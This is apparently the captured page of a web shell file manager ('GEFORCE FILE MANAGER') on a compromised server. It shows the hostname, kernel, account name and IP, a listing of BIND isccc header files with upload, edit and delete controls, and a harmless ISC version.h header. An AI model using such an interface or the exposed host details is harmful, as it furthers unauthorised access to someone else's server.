[ SYSTEM ]: Linux srv.persadacompanies.com 4.18.0-553.56.1.el8_10.x86_64 #1 SMP Tue Jun 10 05:00:59 EDT 2025 x86_64
[ SERVER ]: Apache | PHP: 8.4.19
[ USER ]: persadamedika | IP: 45.64.1.108
GEFORCE FILE MANAGER
/
usr
/
include
/
bind9
/
isccc
/
UPLOAD:
NAME
SIZE
QUICK PERMS
ACTIONS
📄 alist.h
2,399 B
SET
[ EDIT ]
|
[ DEL ]
📄 base64.h
2,438 B
SET
[ EDIT ]
|
[ DEL ]
📄 cc.h
3,704 B
SET
[ EDIT ]
|
[ DEL ]
📄 ccmsg.h
3,648 B
SET
[ EDIT ]
|
[ DEL ]
📄 events.h
1,539 B
SET
[ EDIT ]
|
[ DEL ]
📄 lib.h
1,568 B
SET
[ EDIT ]
|
[ DEL ]
📄 result.h
2,190 B
SET
[ EDIT ]
|
[ DEL ]
📄 sexpr.h
2,997 B
SET
[ EDIT ]
|
[ DEL ]
📄 symtab.h
4,229 B
SET
[ EDIT ]
|
[ DEL ]
📄 symtype.h
1,454 B
SET
[ EDIT ]
|
[ DEL ]
📄 types.h
1,749 B
SET
[ EDIT ]
|
[ DEL ]
📄 util.h
5,004 B
SET
[ EDIT ]
|
[ DEL ]
📄 version.h
707 B
SET
[ EDIT ]
|
[ DEL ]
DELETE SELECTED
[ CLOSE ]
EDIT: version.h
/* * Copyright (C) Internet Systems Consortium, Inc. ("ISC") * * This Source Code Form is subject to the terms of the Mozilla Public * License, v. 2.0. If a copy of the MPL was not distributed with this * file, you can obtain one at https://mozilla.org/MPL/2.0/. * * See the COPYRIGHT file distributed with this work for additional * information regarding copyright ownership. */ /*! \file isccc/version.h */ #include <isc/platform.h> LIBISCCC_EXTERNAL_DATA extern const char isccc_version[]; LIBISCCC_EXTERNAL_DATA extern const unsigned int isccc_libinterface; LIBISCCC_EXTERNAL_DATA extern const unsigned int isccc_librevision; LIBISCCC_EXTERNAL_DATA extern const unsigned int isccc_libage;